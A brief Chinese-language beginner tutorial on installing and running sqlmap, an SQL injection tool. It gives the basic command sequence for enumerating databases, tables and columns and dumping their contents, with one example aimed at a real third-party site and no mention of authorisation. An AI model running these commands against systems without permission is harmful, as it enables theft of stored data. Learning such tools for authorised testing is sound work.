sqlmap是一个开源渗透测试工具,可自动检测和利用SQL注入。
使用之前需要先安装python环境,然后下载最新版的sqlmap,解压后将整个文件夹放在python安装目录下即可。
使用时先打开sqlmap文件夹,在空白处按下shift键同时右击,在弹出的的菜单中选择->在此处打开命令行,就可以开始使用了。
sqlmap上手非常简单,命令格式如下:
sqlmap -u xx.com
sqlmap -u xx.com --dbs
sqlmap -u xx.com -D xx --tables
sqlmap -u xx.com -D xx -T xxx --columns
sqlmap -u xx.com -D xx -T xxx -C xx,xx --dump
*** 注解:
-u 指定URL ,-D 指定数据库 ,-T 指定表 ,-C 指定字段
--dbs 爆数据库 , --tables 爆表 , --columns 爆字段 ,--dump 爆内容
使用时需要在前面加上python,例如:
python sqlmap -u http://www.baidu.com
以上是sqlmap最基本的使用方法,作为一个万能注入工具,自然还有许多更高级的用法,在这里就不再深入介绍了,已经入门的同学可以试着往更深处摸索~
